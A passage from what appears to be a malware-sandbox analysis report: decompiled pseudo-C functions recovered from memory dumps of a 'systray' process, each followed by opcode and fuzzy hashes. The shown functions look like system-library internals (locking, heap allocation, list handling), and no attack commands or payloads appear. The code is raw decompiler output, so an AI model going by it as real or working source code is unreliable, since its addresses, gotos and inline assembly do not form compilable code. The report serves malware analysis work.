                                            				signed char* _t181;
                                            				intOrPtr _t189;
                                            				intOrPtr* _t200;
                                            				signed int _t202;
                                            				signed int _t203;
                                            				char _t204;
                                            				signed int _t207;
                                            				signed int _t208;
                                            				void* _t209;
                                            				intOrPtr _t210;
                                            				signed int _t212;
                                            				signed int _t214;
                                            				signed int _t221;
                                            				signed int _t222;
                                            				signed int _t226;
                                            				intOrPtr* _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				intOrPtr _t237;
                                            				intOrPtr _t238;
                                            				intOrPtr _t240;
                                            				void* _t245;
                                            				signed int _t246;
                                            				signed int _t247;
                                            				void* _t248;
                                            				void* _t251;
                                            				void* _t252;
                                            				signed int _t253;
                                            				signed int _t255;
                                            				signed int _t256;
                                            
                                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x468d360 ^ _t255;
                                            				_v32 = _v32 & 0x00000000;
                                            				_t251 = __edx;
                                            				_t237 = __ecx;
                                            				_t212 = 6;
                                            				_t245 =  &_v84;
                                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v48 = __ecx;
                                            				_v36 = _t207;
                                            				_t157 = memset(_t245, 0, _t212 << 2);
                                            				_t256 = _t255 + 0xc;
                                            				_t246 = _t245 + _t212;
                                            				if(_t207 == 2) {
                                            					_t247 =  *(_t237 + 0x60);
                                            					_t208 =  *(_t237 + 0x64);
                                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                            					_v104 = _t159;
                                            					_v76 = _t159;
                                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                            					_v100 = _t160;
                                            					_v72 = _t160;
                                            					L19:
                                            					_v80 = _t208;
                                            					_v84 = _t247;
                                            					L8:
                                            					_t214 = 0;
                                            					if( *(_t237 + 0x74) > 0) {
                                            						_t82 = _t237 + 0x84; // 0x124
                                            						_t161 = _t82;
                                            						_v92 = _t161;
                                            						while( *_t161 >> 0x1f != 0) {
                                            							_t200 = _v92;
                                            							if( *_t200 == 0x80000000) {
                                            								break;
                                            							}
                                            							_t214 = _t214 + 1;
                                            							_t161 = _t200 + 0x10;
                                            							_v92 = _t161;
                                            							if(_t214 <  *(_t237 + 0x74)) {
                                            								continue;
                                            							}
                                            							goto L9;
                                            						}
                                            						_v88 = _t214 << 4;
                                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                            						_t165 = 0;
                                            						asm("adc eax, [ecx+edx+0x7c]");
                                            						_v24 = _t165;
                                            						_v28 = _v40;
                                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                            						_t221 = _v40;
                                            						_v16 =  *_v92;
                                            						_v32 =  &_v28;
                                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                            							goto L9;
                                            						}
                                            						_t240 = _v48;
                                            						if( *_v92 != 0x80000000) {
                                            							goto L9;
                                            						}
                                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                            						_t226 = 0;
                                            						_t181 = _t251 + 0x66;
                                            						_v88 = 0;
                                            						_v92 = _t181;
                                            						do {
                                            							if( *((char*)(_t181 - 2)) == 0) {
                                            								goto L31;
                                            							}
                                            							_t226 = _v88;
                                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                            								_t181 = E045DD0F0(1, _t226 + 0x20, 0);
                                            								_t226 = _v40;
                                            								 *(_t226 + 8) = _t181;
                                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                            								L34:
                                            								if(_v44 == 0) {
                                            									goto L9;
                                            								}
                                            								_t210 = _v44;
                                            								_t127 = _t210 + 0x1c; // 0x1c
                                            								_t249 = _t127;
                                            								E045B2280(_t181, _t127);
                                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                            									L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                            								}
                                            								_t189 = L045B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                            								if(_t189 != 0) {
                                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                            									 *_t232 = _t232 + 0x10;
                                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                            									E045DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                            									_t256 = _t256 + 0xc;
                                            								}
                                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                            								E045AFFB0(_t210, _t249, _t249);
                                            								_t222 = _v76;
                                            								_t172 = _v80;
                                            								_t208 = _v84;
                                            								_t247 = _v88;
                                            								L10:
                                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                            								_v44 = _t238;
                                            								if(_t238 != 0) {
                                            									 *0x468b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                            									_v44();
                                            								}
                                            								_pop(_t248);
                                            								_pop(_t252);
                                            								_pop(_t209);
                                            								return E045DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                            							}
                                            							_t181 = _v92;
                                            							L31:
                                            							_t226 = _t226 + 1;
                                            							_t181 =  &(_t181[0x18]);
                                            							_v88 = _t226;
                                            							_v92 = _t181;
                                            						} while (_t226 < 4);
                                            						goto L34;
                                            					}
                                            					L9:
                                            					_t172 = _v104;
                                            					_t222 = _v100;
                                            					goto L10;
                                            				}
                                            				_t247 = _t246 | 0xffffffff;
                                            				_t208 = _t247;
                                            				_v84 = _t247;
                                            				_v80 = _t208;
                                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                            					_t233 = _v72;
                                            					_v105 = _v64;
                                            					_t202 = _v76;
                                            				} else {
                                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                            					_v105 = 1;
                                            					if(_v63 <= _t204) {
                                            						_v63 = _t204;
                                            					}
                                            					_t202 = _v76 |  *(_t251 + 0x40);
                                            					_t233 = _v72 |  *(_t251 + 0x44);
                                            					_t247 =  *(_t251 + 0x38);
                                            					_t208 =  *(_t251 + 0x3c);
                                            					_v76 = _t202;
                                            					_v72 = _t233;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				_v104 = _t202;
                                            				_v100 = _t233;
                                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                                            					_t237 = _v48;
                                            					_v105 = 1;
                                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                            						_t237 = _v48;
                                            					}
                                            					_t203 = _t202 |  *(_t251 + 0xb8);
                                            					_t234 = _t233 |  *(_t251 + 0xbc);
                                            					_t247 = _t247 &  *(_t251 + 0xb0);
                                            					_t208 = _t208 &  *(_t251 + 0xb4);
                                            					_v104 = _t203;
                                            					_v76 = _t203;
                                            					_v100 = _t234;
                                            					_v72 = _t234;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				if(_v105 == 0) {
                                            					_v36 = _v36 & 0x00000000;
                                            					_t208 = 0;
                                            					_t247 = 0;
                                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                            					goto L19;
                                            				} else {
                                            					_v36 = 1;
                                            					goto L8;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09ff3c1aeec6b2be93ce1ec88f5f7196a9811bef41c156ae325b95f7a6404ba5
                                            • Instruction ID: 254cb37e5e21d922476680eb24b2abaf7479447137a2ca197cbbae888d907f38
                                            • Opcode Fuzzy Hash: 09ff3c1aeec6b2be93ce1ec88f5f7196a9811bef41c156ae325b95f7a6404ba5
                                            • Instruction Fuzzy Hash: 16C136755083819FD354CF68C580A5AFBF1BF88304F14896EF9998B392E771E945CB42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E045952A5(char __ecx) {
                                            				char _v20;
                                            				char _v28;
                                            				char _v29;
                                            				void* _v32;
                                            				void* _v36;
                                            				void* _v37;
                                            				void* _v38;
                                            				void* _v40;
                                            				void* _v46;
                                            				void* _v64;
                                            				void* __ebx;
                                            				intOrPtr* _t49;
                                            				signed int _t53;
                                            				short _t85;
                                            				signed int _t87;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t102;
                                            				intOrPtr* _t104;
                                            				signed int _t106;
                                            				void* _t108;
                                            
                                            				_t93 = __ecx;
                                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                            				_push(_t88);
                                            				_v29 = __ecx;
                                            				_t89 = _t88 | 0xffffffff;
                                            				while(1) {
                                            					E045AEEF0(0x46879a0);
                                            					_t104 =  *0x4688210; // 0x442bd8
                                            					if(_t104 == 0) {
                                            						break;
                                            					}
                                            					asm("lock inc dword [esi]");
                                            					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                            					E045AEB70(_t93, 0x46879a0);
                                            					if( *((char*)(_t108 + 0xf)) != 0) {
                                            						_t101 =  *0x7ffe02dc;
                                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                            							L9:
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0x90028);
                                            							_push(_t108 + 0x20);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push( *((intOrPtr*)(_t104 + 4)));
                                            							_t53 = E045D9890();
                                            							__eflags = _t53;
                                            							if(_t53 >= 0) {
                                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                            									E045AEEF0(0x46879a0);
                                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                            									E045AEB70(0, 0x46879a0);
                                            								}
                                            								goto L3;
                                            							}
                                            							__eflags = _t53 - 0xc0000012;
                                            							if(__eflags == 0) {
                                            								L12:
                                            								_t13 = _t104 + 0xc; // 0x442be5
                                            								_t93 = _t13;
                                            								 *((char*)(_t108 + 0x12)) = 0;
                                            								__eflags = E045CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								if(__eflags >= 0) {
                                            									L15:
                                            									_t102 = _v28;
                                            									 *_t102 = 2;
                                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            									E045AEEF0(0x46879a0);
                                            									__eflags =  *0x4688210 - _t104; // 0x442bd8
                                            									if(__eflags == 0) {
                                            										__eflags =  *((char*)(_t108 + 0xe));
                                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                            										 *0x4688210 = _t102;
                                            										_t32 = _t102 + 0xc; // 0x0
                                            										 *_t95 =  *_t32;
                                            										_t33 = _t102 + 0x10; // 0x0
                                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                            										_t35 = _t102 + 4; // 0xffffffff
                                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                            										if(__eflags != 0) {
                                            											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                            											E04614888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                            										}
                                            										E045AEB70(_t95, 0x46879a0);
                                            										asm("lock xadd [esi], eax");
                                            										if(__eflags == 0) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E045D95D0();
                                            											L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										asm("lock xadd [esi], ebx");
                                            										__eflags = _t89 == 1;
                                            										if(_t89 == 1) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E045D95D0();
                                            											L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										_t49 = _t102;
                                            										L4:
                                            										return _t49;
                                            									}
                                            									E045AEB70(_t93, 0x46879a0);
                                            									asm("lock xadd [esi], eax");
                                            									if(__eflags == 0) {
                                            										_push( *((intOrPtr*)(_t104 + 4)));
                                            										E045D95D0();
                                            										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            									}
                                            									 *_t102 = 1;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										_t28 = _t102 + 4; // 0xffffffff
                                            										_push( *_t28);
                                            										E045D95D0();
                                            										L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                            									}
                                            									continue;
                                            								}
                                            								_t93 =  &_v20;
                                            								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                            								_t85 = 6;
                                            								_v20 = _t85;
                                            								_t87 = E045CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								__eflags = _t87;
                                            								if(_t87 < 0) {
                                            									goto L3;
                                            								}
                                            								 *((char*)(_t108 + 0xe)) = 1;
                                            								goto L15;
                                            							}
                                            							__eflags = _t53 - 0xc000026e;
                                            							if(__eflags != 0) {
                                            								goto L3;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                            							goto L3;
                                            						} else {
                                            							goto L9;
                                            						}
                                            					}
                                            					L3:
                                            					_t49 = _t104;
                                            					goto L4;
                                            				}
                                            				_t49 = 0;
                                            				goto L4;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9feabb14bdc7d8f74ab05fc440fa58bcebdd33acc83e41c19e26fef78950eee
                                            • Instruction ID: 7e45d85369b5935c0f4b2a300f588ae86faadc2dae9cc583b23a44e856d90071
                                            • Opcode Fuzzy Hash: f9feabb14bdc7d8f74ab05fc440fa58bcebdd33acc83e41c19e26fef78950eee
                                            • Instruction Fuzzy Hash: 8551DD71205342ABEB21AF28C841B2BBBE4FF84B14F14092DE59587691E770F814EB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E045AEF40(intOrPtr __ecx) {
                                            				char _v5;
                                            				char _v6;
                                            				char _v7;
                                            				char _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t58;
                                            				char _t59;
                                            				signed char _t69;
                                            				void* _t73;
                                            				signed int _t74;
                                            				char _t79;
                                            				signed char _t81;
                                            				signed int _t85;
                                            				signed int _t87;
                                            				intOrPtr _t90;
                                            				signed char* _t91;
                                            				void* _t92;
                                            				signed int _t94;
                                            				void* _t96;
                                            
                                            				_t90 = __ecx;
                                            				_v16 = __ecx;
                                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                            					_t58 =  *((intOrPtr*)(__ecx));
                                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                            						E04599080(_t73, __ecx, __ecx, _t92);
                                            					}
                                            				}
                                            				_t74 = 0;
                                            				_t96 =  *0x7ffe036a - 1;
                                            				_v12 = 0;
                                            				_v7 = 0;
                                            				if(_t96 > 0) {
                                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                            					_v12 = _t74;
                                            					_v7 = _t96 != 0;
                                            				}
                                            				_t79 = 0;
                                            				_v8 = 0;
                                            				_v5 = 0;
                                            				while(1) {
                                            					L4:
                                            					_t59 = 1;
                                            					L5:
                                            					while(1) {
                                            						if(_t59 == 0) {
                                            							L12:
                                            							_t21 = _t90 + 4; // 0x779cc21e
                                            							_t87 =  *_t21;
                                            							_v6 = 0;
                                            							if(_t79 != 0) {
                                            								if((_t87 & 0x00000002) != 0) {
                                            									goto L19;
                                            								}
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000003;
                                            								} else {
                                            									_t51 = _t87 - 2; // -2
                                            									_t74 = _t51;
                                            								}
                                            								goto L15;
                                            							} else {
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000001;
                                            								} else {
                                            									_t26 = _t87 - 4; // -4
                                            									_t74 = _t26;
                                            									if((_t74 & 0x00000002) == 0) {
                                            										_t74 = _t74 - 2;
                                            									}
                                            								}
                                            								L15:
                                            								if(_t74 == _t87) {
                                            									L19:
                                            									E04592D8A(_t74, _t90, _t87, _t90);
                                            									_t74 = _v12;
                                            									_v8 = 1;
                                            									if(_v7 != 0 && _t74 > 0x64) {
                                            										_t74 = _t74 - 1;
                                            										_v12 = _t74;
                                            									}
                                            									_t79 = _v5;
                                            									goto L4;
                                            								}
                                            								asm("lock cmpxchg [esi], ecx");
                                            								if(_t87 != _t87) {
                                            									_t74 = _v12;
                                            									_t59 = 0;
                                            									_t79 = _v5;
                                            									continue;
                                            								}
                                            								if(_v6 != 0) {
                                            									_t74 = _v12;
                                            									L25:
                                            									if(_v7 != 0) {
                                            										if(_t74 < 0x7d0) {
                                            											if(_v8 == 0) {
                                            												_t74 = _t74 + 1;
                                            											}
                                            										}
                                            										_t38 = _t90 + 0x14; // 0x0
                                            										_t39 = _t90 + 0x14; // 0x0
                                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            											_t85 = _t85 & 0xff000000;
                                            										}
                                            										 *(_t90 + 0x14) = _t85;
                                            									}
                                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                                            									return 0;
                                            								}
                                            								_v5 = 1;
                                            								_t87 = _t74;
                                            								goto L19;
                                            							}
                                            						}
                                            						_t94 = _t74;
                                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                            						if(_t74 == 0) {
                                            							goto L12;
                                            						} else {
                                            							_t91 = _t90 + 4;
                                            							goto L8;
                                            							L9:
                                            							while((_t81 & 0x00000001) != 0) {
                                            								_t69 = _t81;
                                            								asm("lock cmpxchg [edi], edx");
                                            								if(_t69 != _t81) {
                                            									_t81 = _t69;
                                            									continue;
                                            								}
                                            								_t90 = _v16;
                                            								goto L25;
                                            							}
                                            							asm("pause");
                                            							_t94 = _t94 - 1;
                                            							if(_t94 != 0) {
                                            								L8:
                                            								_t81 =  *_t91;
                                            								goto L9;
                                            							} else {
                                            								_t90 = _v16;
                                            								_t79 = _v5;
                                            								goto L12;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction ID: b2a70a712138cd702a1e615a0739e5d12d50b79be489dade7cacd99a6fff3da7
                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                            • Instruction Fuzzy Hash: 89512231A04249EFDB20CF68D0C17AEBBB1FF05304F1881A8C64697281D375B9A9E751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E0466740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                            				signed short* _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _t55;
                                            				void* _t56;
                                            				intOrPtr* _t66;
                                            				intOrPtr* _t69;
                                            				void* _t74;
                                            				intOrPtr* _t78;
                                            				intOrPtr* _t81;
                                            				intOrPtr* _t82;
                                            				intOrPtr _t83;
                                            				signed short* _t84;
                                            				intOrPtr _t85;
                                            				signed int _t87;
                                            				intOrPtr* _t90;
                                            				intOrPtr* _t93;
                                            				intOrPtr* _t94;
                                            				void* _t98;
                                            
                                            				_t84 = __edx;
                                            				_t80 = __ecx;
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t55 = __ecx;
                                            				_v8 = __edx;
                                            				_t87 =  *__edx & 0x0000ffff;
                                            				_v12 = __ecx;
                                            				_t3 = _t55 + 0x154; // 0x154
                                            				_t93 = _t3;
                                            				_t78 =  *_t93;
                                            				_t4 = _t87 + 2; // 0x2
                                            				_t56 = _t4;
                                            				while(_t78 != _t93) {
                                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                            						L4:
                                            						_t78 =  *_t78;
                                            						continue;
                                            					} else {
                                            						_t7 = _t78 + 0x18; // 0x18
                                            						if(E045ED4F0(_t7, _t84[2], _t87) == _t87) {
                                            							_t40 = _t78 + 0xc; // 0xc
                                            							_t94 = _t40;
                                            							_t90 =  *_t94;
                                            							while(_t90 != _t94) {
                                            								_t41 = _t90 + 8; // 0x8
                                            								_t74 = E045DF380(_a4, _t41, 0x10);
                                            								_t98 = _t98 + 0xc;
                                            								if(_t74 != 0) {
                                            									_t90 =  *_t90;
                                            									continue;
                                            								}
                                            								goto L12;
                                            							}
                                            							_t82 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            							if(_t82 != 0) {
                                            								_t46 = _t78 + 0xc; // 0xc
                                            								_t69 = _t46;
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								asm("movsd");
                                            								_t85 =  *_t69;
                                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            									L20:
                                            									_t82 = 3;
                                            									asm("int 0x29");
                                            								}
                                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                            								 *_t82 = _t85;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                            								 *_t69 = _t82;
                                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                            								goto L11;
                                            							} else {
                                            								L18:
                                            								_push(0xe);
                                            								_pop(0);
                                            							}
                                            						} else {
                                            							_t84 = _v8;
                                            							_t9 = _t87 + 2; // 0x2
                                            							_t56 = _t9;
                                            							goto L4;
                                            						}
                                            					}
                                            					L12:
                                            					return 0;
                                            				}
                                            				_t10 = _t87 + 0x1a; // 0x1a
                                            				_t78 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                            				if(_t78 == 0) {
                                            					goto L18;
                                            				} else {
                                            					_t12 = _t87 + 2; // 0x2
                                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                            					_t16 = _t78 + 0x18; // 0x18
                                            					E045DF3E0(_t16, _v8[2], _t87);
                                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                            					_t19 = _t78 + 0xc; // 0xc
                                            					_t66 = _t19;
                                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                            					 *_t66 = _t66;
                                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                            					_t81 = L045B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                            					if(_t81 == 0) {
                                            						goto L18;
                                            					} else {
                                            						_t26 = _t78 + 0xc; // 0xc
                                            						_t69 = _t26;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t85 =  *_t69;
                                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            							goto L20;
                                            						} else {
                                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                            							 *_t81 = _t85;
                                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                            							 *_t69 = _t81;
                                            							_t83 = _v12;
                                            							 *(_t78 + 8) = 1;
                                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							_t34 = _t83 + 0x154; // 0x1ba
                                            							_t69 = _t34;
                                            							_t85 =  *_t69;
                                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                            								goto L20;
                                            							} else {
                                            								 *_t78 = _t85;
                                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                            								 *_t69 = _t78;
                                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                            							}
                                            						}
                                            						goto L11;
                                            					}
                                            				}
                                            				goto L12;
                                            			}






















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction ID: 52e3170a1fa7f268feaef460a4b84cb3a5ccd7c35db1c36aef47ae420c1987c4
                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                            • Instruction Fuzzy Hash: 95517C71600606EFDB25CF14D480A96BBB5FF45309F15C1AAE9099F222E771FA46CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E045C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				char _v176;
                                            				char _v177;
                                            				char _v184;
                                            				intOrPtr _v192;
                                            				intOrPtr _v196;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short _t42;
                                            				char* _t44;
                                            				intOrPtr _t46;
                                            				intOrPtr _t50;
                                            				char* _t57;
                                            				intOrPtr _t59;
                                            				intOrPtr _t67;
                                            				signed int _t69;
                                            
                                            				_t64 = __edx;
                                            				_v12 =  *0x468d360 ^ _t69;
                                            				_t65 = 0xa0;
                                            				_v196 = __edx;
                                            				_v177 = 0;
                                            				_t67 = __ecx;
                                            				_v192 = __ecx;
                                            				E045DFA60( &_v176, 0, 0xa0);
                                            				_t57 =  &_v176;
                                            				_t59 = 0xa0;
                                            				if( *0x4687bc8 != 0) {
                                            					L3:
                                            					while(1) {
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t67 = _v192;
                                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                            						_push( &_v184);
                                            						_push(_t59);
                                            						_push(_t57);
                                            						_push(0xa0);
                                            						_push(_t57);
                                            						_push(0xf);
                                            						_t42 = E045DB0B0();
                                            						if(_t42 != 0xc0000023) {
                                            							break;
                                            						}
                                            						if(_v177 != 0) {
                                            							L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            						}
                                            						_v177 = 1;
                                            						_t44 = L045B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                            						_t59 = _v184;
                                            						_t57 = _t44;
                                            						if(_t57 != 0) {
                                            							continue;
                                            						} else {
                                            							_t42 = 0xc0000017;
                                            							break;
                                            						}
                                            					}
                                            					if(_t42 != 0) {
                                            						_t65 = E0459CCC0(_t42);
